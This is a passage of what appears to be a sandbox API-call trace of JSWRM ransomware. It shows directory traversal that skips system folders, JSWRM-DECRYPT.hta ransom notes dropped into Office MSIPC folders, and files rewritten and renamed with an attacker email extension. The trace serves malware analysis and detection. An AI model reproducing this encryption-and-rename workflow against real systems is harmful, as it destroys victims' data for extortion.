(lpString1="kk", lpString2="documents and settings") returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="$RECYCLE.BIN") returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="system volume information") returned -1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="msocache") returned -1 [0136.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\jswrm-decrypt.hta")) returned 0xffffffff [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.513] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.513] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.514] CloseHandle (hObject=0x238) returned 1 [0136.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\jswrm-decrypt.hta")) returned 0x20 [0136.515] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48073bb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0136.515] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.515] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48073bb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.515] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.515] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.515] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48073bb7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48073bb7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48073bb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.515] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.515] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.515] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.516] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.517] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.517] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.517] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.693] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.693] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.693] CloseHandle (hObject=0x314) returned 1 [0136.693] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\kk\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\kk\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.695] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.695] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0136.695] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f9c329, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ko", cAlternateFileName="")) returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="...") returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="windows") returned -1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="recovery") returned -1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="perflogs") returned -1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="documents and settings") returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="$RECYCLE.BIN") returned 1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="system volume information") returned -1 [0136.695] lstrcmpiW (lpString1="ko", lpString2="msocache") returned -1 [0136.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\jswrm-decrypt.hta")) returned 0xffffffff [0136.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.696] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.697] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.697] CloseHandle (hObject=0x238) returned 1 [0136.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\jswrm-decrypt.hta")) returned 0x20 [0136.698] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4823e57f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0136.698] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.698] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4823e57f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.698] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.698] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.698] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4823e57f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4823e57f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4823e57f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.698] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.698] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6034d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.699] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.700] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16536) returned 1 [0136.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.700] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4090, lpOverlapped=0x0) returned 1 [0136.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.703] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4090, lpOverlapped=0x0) returned 1 [0136.703] CloseHandle (hObject=0x314) returned 1 [0136.703] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ko\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ko\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.704] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6034d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.704] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0136.704] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="lt", cAlternateFileName="")) returned 1 [0136.704] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0136.704] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0136.704] lstrcmpiW (lpString1="lt", lpString2="...") returned 1 [0136.704] lstrcmpiW (lpString1="lt", lpString2="windows") returned -1 [0136.704] lstrcmpiW (lpString1="lt", lpString2="recovery") returned -1 [0136.705] lstrcmpiW (lpString1="lt", lpString2="perflogs") returned -1 [0136.705] lstrcmpiW (lpString1="lt", lpString2="documents and settings") returned 1 [0136.705] lstrcmpiW (lpString1="lt", lpString2="$RECYCLE.BIN") returned 1 [0136.705] lstrcmpiW (lpString1="lt", lpString2="system volume information") returned -1 [0136.705] lstrcmpiW (lpString1="lt", lpString2="msocache") returned -1 [0136.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\jswrm-decrypt.hta")) returned 0xffffffff [0136.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 